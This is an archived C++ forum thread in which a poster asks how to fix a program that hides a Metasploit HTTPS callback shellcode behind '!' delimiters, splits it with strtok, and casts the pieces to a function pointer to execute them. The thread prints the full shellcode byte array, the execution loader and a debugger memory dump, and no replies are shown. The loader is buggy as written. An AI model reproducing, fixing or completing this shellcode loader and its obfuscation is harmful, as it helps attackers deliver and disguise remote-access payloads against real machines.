strtok, shellcode help?
Nov 14, 2013 at 9:57pm UTC
Hello all,
I’m new to C++ and I’m trying to create a program that will replace one character array of hex and then execute it. I can execute it natively if I were to remove the “!”. I used strtok to split up the char and I was hoping it would reassemble in into a char array.
As I said I’m new so I’m really just looking for a direction to go in vs. an answer. Any help would be great. The shellcode is a metasploit https callback to 127.0.0.1.
Thanks!
1#include <stdio.h>
#include <cstring>
using namespace std;
int main(int argc, char **argv)
{
char str[] = "!\xba!\x3f!\x75!\x41!\x90!\xda!\xdf!\xd9!\x74!\x24!\xf4!\x5e!\x33!\xc9!\xb1!\x5c!\x83!\xee!\xfc!\x31!\x56!\x0f!\x03!\x56!\x30!\x97!\xb4!\x6c!\xa6!\xde!\x37!\x8d!\x36!\x81!\xbe!\x68!\x07!\x93!\xa5!\xf9!\x35!\x23!\xad!\xac!\xb5!\xc8!\xe3!\x44!\x4e!\xbc!\x2b!\x6a!\xe7!\x0b!\x0a!\x45!\xf8!\xbd!\x92!\x09!\x3a!\xdf!\x6e!\x50!\x6e!\x3f!\x4e!\x9b!\x63!\x3e!\x97!\xc6!\x8b!\x12!\x40!\x8c!\x39!\x83!\xe5!\xd0!\x81!\xa2!\x29!\x5f!\xb9!\xdc!\x4c!\xa0!\x4d!\x57!\x4e!\xf1!\xfd!\xec!\x18!\xe9!\x76!\xaa!\xb8!\x08!\x5b!\xa8!\x85!\x43!\xd0!\x1b!\x7d!\x52!\x30!\x52!\x7e!\x64!\x7c!\x39!\x41!\x48!\x71!\x43!\x85!\x6f!\x69!\x36!\xfd!\x93!\x14!\x41!\xc6!\xee!\xc2!\xc4!\xdb!\x49!\x81!\x7f!\x38!\x6b!\x46!\x19!\xcb!\x67!\x23!\x6d!\x93!\x6b!\xb2!\xa2!\xaf!\x90!\x3f!\x45!\x60!\x11!\x7b!\x62!\xa4!\x79!\xd8!\x0b!\xfd!\x27!\x8f!\x34!\x1d!\x8f!\x70!\x91!\x55!\x22!\x65!\xa3!\x37!\x2b!\x17!\xc9!\xb3!\xab!\x8f!\x66!\x55!\xc2!\x26!\xdd!\xcd!\x56!\xcf!\xfb!\x0a!\x98!\xfa!\x35!\xea!\x31!\x53!\x61!\x43!\xd4!\x5b!\xd9!\x03!\x12!\x0d!\x98!\x74!\x9d!\x64!\xb1!\x24!\x39!\xb7!\x8f!\x8a!\xec!\xdd!\x0c!\x7c!\x5e!\x49!\xa8!\x7f!\x60!\x89!\x9d!\x2f!\x08!\xde!\xa8!\x4f!\x0e!\x1f!\x7f!\x84!\xc7!\x86!\xb1!\x89!\x8a!\x50!\xb2!\x1f!\x8b!\x24!\xe0!\x0d!\x99!\x75!\x57!\xe2!\x75!\x9e!\x02!\x2c!\xbd!\x9f!\x78!\xb9!\x07!\x35!\x93!\xe1!\xef!\x49!\xa0!\x15!\xf0!\xc0!\x27!\x7f!\xf4!\x82!\xcd!\x9f!\xa2!\x4a!\x67!\xe6!\xd4!\x0c!\x78!\x33!\xd9!\xef!\xd0!\xeb!\x4d!\x58!\x89!\x7b!\x5f!\x60!\x2d!\x07!\x60!\xb9!\xc8!\x37!\xeb!\x5b!\x98!\xc3!\x04!\xb0!\xcb!\xc7!\x6c!\xae!\x47!\xe8!\x90!\xd1!\x87!\x5d!\x3c!\x57!\x9d!\x61!\xc2!\xcf!\xed!\xd7!\x60!\x59!\xf1!\xcd!\x0f!\x25!\x65!\xee!\xdf!\xa5!\x75!\x86!\xdf!\xa5!\x35!\x56!\xb7!\xcd!\xed!\xf2!\x64!\xe8!\xf1!\x2e!\x19!\xa1!\x5e!\x58!\xf9!\x12!\x09!\x5a!\x26!\x9c!\xc9!\x09!\x70!\xf4!\xdb!\x3b!\xf5!\xe6!\x23!\x96!\x83!\x26!\xaf!\xd4!\x07!\xa1!\x51!\x24!\x92!\x6d!\x24!\x4f!\xc5!\xae!\x2f!\xde!\x09!\xcf!\x4f!\xd0!\xc7!\x18!\x9e!\x23!\x06!\x56!\xf0!\x72!\x56" ;
//char str[] = "!this!is!my!dog!fred";
char delim[] = "!" ;
char * token;
for (token = strtok(str, delim); token; token = strtok(NULL, delim))
{
// printf(token);
int (*func)();
func = (int (*)()) token;
(int )(*func)();
}
}
So after looking at the program in a debugger I see that the shellcode has what appears to be a period separating each character. How can I remove the period?
10046D000 20 D9 00 ED 00 BE 00 7B Ù.í.¾.{
0046D008 00 05 00 72 00 25 00 D9 .�.r.%.Ù
0046D010 00 74 00 24 00 F4 00 58 .t.$.ô.X
0046D018 00 2B 00 C9 00 B1 00 5D .+.É.±.]
0046D020 00 31 00 70 00 18 00 83 .1.p.<.ƒ
0046D028 00 C0 00 04 00 03 00 70 .À.�.�.p
0046D030 00 6F 00 E7 00 87 00 D9 .o.ç.‡.Ù
0046D038 00 67 00 6E 00 67 00 22 .g.n.g."
0046D040 00 77 00 11 00 E1 00 C7 .w.�.á.Ç
0046D048 00 46 00 03 00 95 00 8C .F.�.•.Œ
0046D050 00 FA 00 93 00 DD 00 C1 .ú.“.Ý.Á
0046D058 00 F6 00 58 00 B3 00 F1 .ö.X.³.ñ
0046D060 00 8D 00 2D 00 1C 00 F5 ..-.�.õ
0046D068 00 26 00 9B 00 7A 00 38 .&.›.z.8
0046D070 00 B7 00 2D 00 43 00 96 .·.-.C.–
0046D078 00 7B 00 2F 00 3F 00 E5 .{./.?.å
0046D080 00 AF 00 8F 00 7E 00 26 .¯..~.&
0046D088 00 A2 00 CE 00 47 00 5B .¢.Î.G.[
0046D090 00 4C 00 82 00 10 00 17 .L.‚.�.]
0046D098 00 FE 00 33 00 14 00 65 .þ.3.�.e
0046D0A0 00 C2 00 32 00 FA 00 E1 .Â.2.ú.á
0046D0A8 00 7A 00 4D 00 7F 00 35 .z.M..5
0046D0B0 00 0E 00 E7 00 7E 00 66 .�.ç.~.f
0046D0B8 00 BE 00 7C 00 C8 00 .¾.|.È.
Last edited on Nov 15, 2013 at 3:21pm UTC
Topic archived. No new replies allowed.
